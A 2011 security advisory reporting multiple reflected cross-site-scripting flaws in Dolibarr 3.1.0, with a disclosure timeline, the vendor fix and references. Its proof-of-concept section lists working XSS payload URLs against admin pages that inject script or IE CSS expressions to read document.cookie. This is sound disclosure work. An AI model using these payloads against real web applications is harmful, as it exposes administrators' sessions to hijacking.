INFOSERVE-ADV2011-03 - Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0

Posted by Stefan Schurtz on Thursday, November 10. 2011

Advisory:	Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0
Advisory ID:	INFOSERVE-ADV2011-03
Author:	Stefan Schurtz
Contact:	security@infoserve.de
Affected Software:	Successfully tested on Dolibarr 3.1.0 other versions may also be affected
Vendor URL:	http://www.dolibarr.org/
Vendor Status:	fixed in the 3.1 branch

======================
Vulnerability Description:
======================

Dolibarr 3.1.0 is prone to multiple XSS vulnerability

==============
PoC-Exploit
==============

Cross-Site-Scripting – parameter ‘username’

http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username=’"</script><script>alert(document.cookie)</script>

            http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username=’"</script><script>alert(document.cookie)</script>&=3&optioncss=print

IE-only

http://<target>/admin/security_other.php/" stYle="x:expre/**/ssion(alert(document.cookie))
http://<target>/admin/events.php/" stYle="x:expre/**/ssion(alert(document.cookie))
http://<target>/admin/user.php/" stYle="x:expre/**/ssion(alert(document.cookie))

=====

Solution:

=====

Fixed in the 3.1 branch

================

Disclosure Timeline:

================

08-Nov-2011 – vendor informed

09-Nov-2011 – vendor fix in the 3.1 branch

09-Nov-2011 – release date of this security advisory

09-Nov-2011 – Post on BugTraq

====

Credits:

====

Vulnerabilities found and advisory written by the INFOSERVE Security Team

=======

References:

=======

https://doliforge.org/tracker/?func=detail&aid=232&group_id=144

            https://github.com/Dolibarr/dolibarr/commit/762f98ab4137749d0993612b4e3544a4207e78a1

            http://www.dolibarr.org

http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-03.txt

Trackbacks

Trackback specific URI for this entry

No Trackbacks

Comments

Display comments as Linear | Threaded

No comments

Add Comment

Name

Homepage

Comment

In reply to

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.

Enter the string from the spam-prevention image above:

Textile-formatting allowed

You can use [geshi lang=lang_name [,ln={y|n}]][/geshi] tags to embed source code snippets.

Form options

Remember Information?

Subscribe to this entry

Mon	Tue	Wed	Thu	Fri	Sat	Sun
← Back	October '22
					1	2
3	4	5	6	7	8	9
10	11	12	13	14	15	16
17	18	19	20	21	22	23
24	25	26	27	28	29	30
31